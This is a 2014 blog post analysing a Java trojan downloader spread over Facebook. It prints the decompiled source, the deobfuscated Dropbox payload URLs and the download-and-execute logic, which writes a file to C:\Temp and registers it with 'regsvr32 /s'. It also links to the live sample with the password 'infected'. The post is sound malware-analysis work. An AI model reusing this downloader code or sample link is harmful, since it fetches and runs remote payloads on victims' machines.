Monday, June 23, 2014

Malware spread over Facebook - TrojanDownloader:Java/Carastavona.E

Earlier today, I stumbled upon a blogpost by Bitdefender which describes a malware sample that spreads across Facebook users:

http://www.hotforsecurity.com/blog/its-not-funny-facebook-users-tricked-into-bitcoin-mining-9263.html

I thought to give it a shot, since I have realized in my last article that reversing Java malware is quite funny, probably because it is easier and not that exhausting as looking over hundreds/thousands of lines of disassembled code. Unfortunately, the article doesn't give any hashes, just the file name of the malware sample which is named IMAG00953.zip.


So, after a quick search on Google I found the sample (SHA256: 717fea98bd94ce7b13ffa9ac175d780fb553adde78b89cc861e8885cbb303342) and also (allegedly) found the payloads (Bot + Bitcoin miner). Nevertheless, this article only describes the intital Java downloader.

So, we fire up our favorite Java Decompiler and load the malicious package. At a first glance, we see that the file only consists of seven methods and the main loop. Also, we recognize that the names of the seven methods are obfuscated:

Figure 1: Decompiled Java downloader

Next, we take a look at the single methods and realize that the following methods essentially have the same functionality:

  • DZCMEVYCXARLTFARITYPSICW()
  • WPCJNPJAJ()
  • IYOUMDFKGFCLEVMDYFNPUY()
  • CYZGTWRVCYQBPDXQXF()
  • ZGQTRMCTNPCMWIOCEIKHL()

So, let's pick one of these methods to take a deeper look at its working. I have choosed WPCJNPJAJ():

public static String WPCJNPJAJ()

    throws ScriptException

    {

        ScriptEngineManager localScriptEngineManager = new ScriptEngineManager();

        ScriptEngine localScriptEngine = localScriptEngineManager.getEngineByName("JavaScript");

        String[] arrayOfString = { "5006-4939", "491782/8479", "-178+270", "796-704", "-8394+8478", "-8174+8275", "-9777+9886", "39088/349", "289616/3148", "96784/1052" };

        DecimalFormat localDecimalFormat = new DecimalFormat("#.#");

        StringBuilder localStringBuilder = new StringBuilder(arrayOfString.length);

        for (int i = 0; i < arrayOfString.length; i++)

        {

            Object localObject = localScriptEngine.eval(arrayOfString[i]);

            int j = Integer.parseInt(localDecimalFormat.format(localObject));

            localStringBuilder.append((char)j);

        }

    return localStringBuilder.toString();

    }


At first, we see the method returns a string, so it is probably just a deobfuscation function. At the beginning, a ScriptEngineManager object named localScriptEngineManager gets created. Then, a JavaScript ScriptEngine gets created by using the method getEngineByName(). By looking at the following array of strings, we see that the strings are just simple mathematical equations. Subsequently, these strings get calculated by using the eval() method and converted into decimal format. At last, the decimal numbers get written into the StringBuilder object named localStringBuilder and finally converted into a string which represents the return value. What we just saw here is nothing more than the usual JavaScript technique that has been used by Exploit Kits and attackers to disguise there code on a compromised host in the early days. Obfuscated JavaScript code implemented into a Java application...

Of course, we want to know what the obfuscated string is. Instead of using any special fancy tools, I have used a simple text editor with a replace feature and good ol' Microsoft ExcelTM:

1) Copy the line of code with the obfuscated string into the text editor

String[] arrayOfString = { "5006-4939", "491782/8479", "-178+270", "796-704", "-8394+8478", "-8174+8275", "-9777+9886", "39088/349", "289616/3148", "96784/1052" };


2) Use the replace feature to create a string in the following format

=5006-4939,=491782/8479,=-178+270,=796-704,=-8394+8478,=-8174+8275,=-9777+9886,=39088/349,=289616/3148,=96784/1052


3) Copy and paste this line into Microsoft ExcelTM with the help of the text conversion assistant (due to choosing a seperator [","])

Figure 2: Calculated decimal values in Microsoft ExcelTM

4) Copy the calculated decimal values into an online decimal to ascii converter and we get the final deobfuscated string

"C:\\Temp\\"


Following this scheme, we deobfuscate the other strings and get the following list of strings ordered by method:

DZCMEVYCXARLTFARITYPSICW() -> "http://dl.dropboxusercontent.com/s/xnf57eni8dpd547/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/nwju1443do0kkyw/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/q7qn5enz2han406/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/jklutosvow2sa28/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/nl51ieactma87q0/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/mxflfforve2ju65/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/pf5yxvq1wmjcun2/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/u0kesauq5zs7via/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/999zzu9uopc3d4l/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/h4mausprax5uuq5/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/qr3v6ry67ytqmia/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/esdqhcldb15bvoj/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/b97m1r5czpbp3kl/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/4vpopyvfajnk5n6/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/eezi0yslr3p2i3c/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/lm87mqi4vhqzpzo/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/2tnedia8wtgg4ge/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/evwad7hka3m7rqs/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/r7lrmz50grpcq67/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/9my6b6qiq55qbec/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/n64sjsgn1u6pj4t/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/m0yzhv0t9c000jm/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/fnfipeglmukffva/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/a8qbye3rgz3dtv3/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/n67txrkbirzexl8/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/zfp10kx496fuzb6/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/k6b6ean08gc4b5t/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/dfpsb98gqwhacg7/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/pe445jolibi2kgp/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/p0yrl882nzefi0k/folder.zip?dl=1,http://dl.dropboxusercontent.com/s/ko0ci4hl6hmf1t9/folder.zip?dl=1"

WPCJNPJAJ() -> "C:\\Temp\\"

IYOUMDFKGFCLEVMDYFNPUY() -> "TIWIWSLN.ADZ"

CYZGTWRVCYQBPDXQXF() -> "regsvr32 /s"

ZGQTRMCTNPCMWIOCEIKHL() -> ","


Given the deobfuscated strings, we can almost guess the whole functionality of this malware, but let's take a look at the remaining code. The following method named QBCQQV() implements the execution functionality of the downloaded file:

  public static void QBCQQV()

    throws ScriptException, IOException, InterruptedException

  {

    int i = 0;

    while (i < 15)

    {

      Runtime.getRuntime().exec(CYZGTWRVCYQBPDXQXF() + " " + WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY());

      Thread.sleep(765L);

      i++;

    }

  }


As you can see, it tries to register the downloaded file by executing Windows tool regsvr32.exe with the parameter C:\Temp\TIWIWSLN.ADZ inside a loop.

The following method named XDRMGBAEHXBVGKPBEAXDA() actually implements the downloading functionality. After the file was written to disk it gets executed by calling method QBCQQV():

  public static void XDRMGBAEHXBVGKPBEAXDA(String paramString1, String paramString2)

    throws IOException, ScriptException, InterruptedException

  {

    InputStream localInputStream = URI.create(paramString1).toURL().openStream();

    Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);

    QBCQQV();

  }


Now, that we have analyzed all the single methods, let's take a look at the main function to summarize the functionality of this Java downloader:

  public static void main(String[] paramArrayOfString)

    throws Exception

  {

    new File(WPCJNPJAJ()).mkdir();

    File localFile = new File(WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY());

    if (localFile.exists())

    {

      QBCQQV();

    }

    else

    {

      String[] arrayOfString1 = DZCMEVYCXARLTFARITYPSICW().split(ZGQTRMCTNPCMWIOCEIKHL());

      for (String str1 : arrayOfString1)

      {

        URL localURL = new URL(str1);

        HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();

        localHttpURLConnection.connect();

        if (localHttpURLConnection.getResponseCode() / 100 == 2)

        {

          String str2 = str1;

          String str3 = WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY();

          XDRMGBAEHXBVGKPBEAXDA(str2, str3);

          break;

        }

      }

    }

  }

}


At first, the malware makes a folder C:\Temp\ and creates a file named TIWIWSLN.ADZ inside the folder. If the file already exists, register it by calling function QBCQQV(). Otherwise, try to download the file by subsequently connecting to all the Dropbox URLs one by one. If successful, write the file to disk and register it to the Windows registry (regsvr32.exe).

At the time of this writing, all URLs weren't available anymore.

The malicious Java file can be downloaded here: https://www.dropbox.com/s/05tjo8rogochvkx/TrojanDownloader_Java_Carastavona.E.zip
Password: "infected" (without "")


Update
More info related to this threat can be found here: http://www.malekal.com/2014/06/10/en-virus-facebook-hahaha/


That's it, have a nice day...
Share:

0 Kommentare:

Post a Comment